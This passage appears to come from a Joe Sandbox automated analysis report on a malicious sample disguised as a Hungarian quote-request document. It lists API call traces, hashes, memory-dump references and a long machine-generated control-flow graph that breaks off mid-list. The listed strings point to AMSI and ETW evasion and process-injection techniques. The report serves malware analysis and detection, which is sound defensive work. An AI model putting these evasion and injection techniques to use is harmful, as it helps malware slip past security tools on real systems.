                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A27380,029CB7B8,UacInitialize,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C92A4
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029BDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
                                                                                                                                                    • Part of subcall function 029BDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
                                                                                                                                                    • Part of subcall function 029BDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
                                                                                                                                                    • Part of subcall function 029BDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                    • Part of subcall function 029B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
                                                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,Initialize,02A27380,029CB7B8,00000000,00000000,00000000,ScanString,02A27380,029CB7B8), ref: 029CB2FA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                                                  • Opcode ID: 769130b919238cb42d7054f3c966e83c3710b165044ab925bd159e636eccbf32
                                                                                                                                                  • Instruction ID: 7af64b9907690b4e5000a761f4d53a014ba13696d5c1957ad026490d79d013a5
                                                                                                                                                  • Opcode Fuzzy Hash: 769130b919238cb42d7054f3c966e83c3710b165044ab925bd159e636eccbf32
                                                                                                                                                  • Instruction Fuzzy Hash: 65431235A0021C8FDB11EB68DCA19DE73FAFFC8704F6050E9A4099B654DB70AE568F91
                                                                                                                                                  Function 029C3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 6966 29c3e12-29c5525 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bf094 call 29a4860 call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29be358 call 29a4de0 call 29a4764 call 29a4de0 call 29bdc8c Sleep call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b88b8 call 29a49a0 call 29a3244 call 29be678 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 Sleep call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b7c10 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b7c10 call 29b894c call 29b88b8 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29be358 call 29a4de0 call 29a4764 call 29a4de0 call 29bdc8c call 29b88b8 call 29bf094 call 29a47ec call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b88b8 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b88b8 call 29be358 call 29a4de0 call 29a4764 call 29a4de0 call 29bdc8c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b88b8 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 Sleep call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a49a0 call 29a4d74 call 29bdc04 call 29a49a0 call 29a4d74 call 29bdc04 call 29a49a0 call 29a4d74 call 29bdc04 call 29a49a0 call 29a4d74 call 29bdc04 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4d74 call 29bdc04 call 29a4d74 call 29bdc04 call 29a4d74 7651 29c5530-29c55a7 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6966->7651 7652 29c552b call 29bdc04 6966->7652 7666 29c55ac-29c5d82 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29be398 call 29a4530 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a7acc call 29bf16c call 29a4530 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bf094 call 29bf108 call 29a4530 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 7651->7666 7652->7651 7895 29c7568-29c77e3 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 7666->7895 7896 29c5d88-29c5dcd call 29a4860 call 29a49a0 call 29a46d4 call 29a7e5c 7666->7896 8041 29c8318-29c8517 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 7895->8041 8042 29c77e9-29c797b call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a47ec call 29a49a0 7895->8042 7896->7895 7914 29c5dd3-29c66e5 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29b85bc call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 7896->7914 8875 29c6949-29c706c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a36d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a2f08 call 29a7990 call 29a47ec call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a2f08 call 29a7990 call 29a47ec call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a3700 7914->8875 8876 29c66eb-29c6944 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a4d74 call 29a4de0 call 29a4764 call 29bdc8c 7914->8876 8218 29c851d-29c86f0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a47ec call 29a49a0 call 29a4d74 call 29a4df0 CreateProcessAsUserW 8041->8218 8219 29c93a1-29c9524 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a48ec 8041->8219 8179 29c7980-29c7981 call 29b85bc 8042->8179 8185 29c7986-29c79f1 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 8179->8185 8225 29c79f6-29c79fd call 29b89d0 8185->8225 8431 29c876e-29c8879 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 8218->8431 8432 29c86f2-29c8769 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 8218->8432 8401 29c952a-29c9539 call 29a48ec 8219->8401 8402 29c9cf5-29ca0cb call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 8219->8402 8230 29c7a02-29c7b0c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a49a0 call 29a46d4 8225->8230 8358 29c7b11-29c7b1c call 29badf8 8230->8358 8366 29c7b21-29c7b8c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 8358->8366 8422 29c7b91-29c7b98 call 29b89d0 8366->8422 8401->8402 8413 29c953f-29c9812 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bf094 call 29a4860 call 29a49a0 call 29a46d4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a7e5c 8401->8413 9027 29ca0d0-29ca0d7 call 29b89d0 8402->9027 8834 29c9aef-29c9cf0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a49f8 call 29b8d70 8413->8834 8835 29c9818-29c9aea call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29be358 call 29a4530 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4de0 * 2 call 29a4764 call 29bdc8c 8413->8835 8428 29c7b9d-29c7e3b call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a36d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 8422->8428 8809 29c7e3d-29c7e40 8428->8809 8810 29c7e42-29c80f3 call 29b5aec call 29a4bcc call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a49f8 call 29b7e50 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 8428->8810 8589 29c887b-29c887e 8431->8589 8590 29c8880-29c8ba0 call 29a49f8 call 29bde50 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bd164 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 8431->8590 8432->8431 8589->8590 9125 29c8bb9-29c92c0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 ResumeThread call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 CloseHandle call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8080 call 29b894c * 6 CloseHandle 8590->9125 9126 29c8ba2-29c8bb4 call 29b8730 8590->9126 8809->8810 9350 29c80f8-29c8104 call 29bb118 8810->9350 8834->8402 8835->8834 8876->8875 9036 29ca0dc-29ca0fe call 29a46d4 * 2 9027->9036 9067 29ca103-29ca10a call 29b89d0 9036->9067 9081 29ca10f-29ca131 call 29a46d4 * 2 9067->9081 9110 29ca136-29ca13d call 29b89d0 9081->9110 9124 29ca142-29ca164 call 29a46d4 * 2 9110->9124 9150 29ca169-29ca170 call 29b89d0 9124->9150 9812 29c92c5-29c939c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 9125->9812 9126->9125 9166 29ca175-29ca197 call 29a46d4 * 2 9150->9166 9195 29ca19c-29ca1a3 call 29b89d0 9166->9195 9210 29ca1a8-29ca213 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 9195->9210 9286 29ca218-29ca21f call 29b89d0 9210->9286 9298 29ca224-29ca469 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 9286->9298 9527 29ca46e-29ca475 call 29b89d0 9298->9527 9361 29c8109-29c8120 call 29a3700 9350->9361 9533 29ca47a-29ca49c call 29a46d4 * 2 9527->9533 9546 29ca4a1-29ca4a8 call 29b89d0 9533->9546 9550 29ca4ad-29ca4cf call 29a46d4 * 2 9546->9550 9563 29ca4d4-29ca4db call 29b89d0 9550->9563 9569 29ca4e0-29ca502 call 29a46d4 * 2 9563->9569 9581 29ca507-29ca50e call 29b89d0 9569->9581 9588 29ca513-29ca9ad call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 